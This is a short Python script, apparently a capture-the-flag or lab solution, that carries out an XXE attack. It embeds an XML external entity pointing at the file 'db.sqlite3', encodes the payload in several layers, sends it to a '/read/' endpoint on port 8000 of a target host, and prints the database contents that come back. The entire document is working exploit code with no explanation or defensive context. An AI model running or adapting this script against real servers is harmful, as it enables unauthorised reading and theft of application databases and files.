import base64
import urllib.parse
import urllib.request
import sys

exploit_xml = """
<?xml version="1.0" ?>
<!DOCTYPE xxe [
<!ENTITY gt SYSTEM "file://db.sqlite3">
]>
<report>
<id>&gt;</id>
<reason>Sample Reason</reason>
</report>
"""

PORT = 8000


def exploit(target):
    exploit_xml_b64 = base64.b64encode(exploit_xml.encode('utf-8'))
    exploit_xml_b64_url = urllib.parse.quote(exploit_xml_b64.decode('utf-8'), safe='')
    exploit_xml_finished = f"report/?report={exploit_xml_b64_url}#"
    exploit_xml_to_send_pre = urllib.parse.quote(exploit_xml_finished, safe='')
    exploit_xml_to_send = urllib.parse.quote(exploit_xml_to_send_pre, safe='')

    db_output = urllib.request.urlopen(f"http://{target}:{PORT}/read/{exploit_xml_to_send}/loremipsum").read()
    print(db_output)


if __name__ == '__main__':
    exploit(sys.argv[1] if len(sys.argv) > 1 else 'localhost')
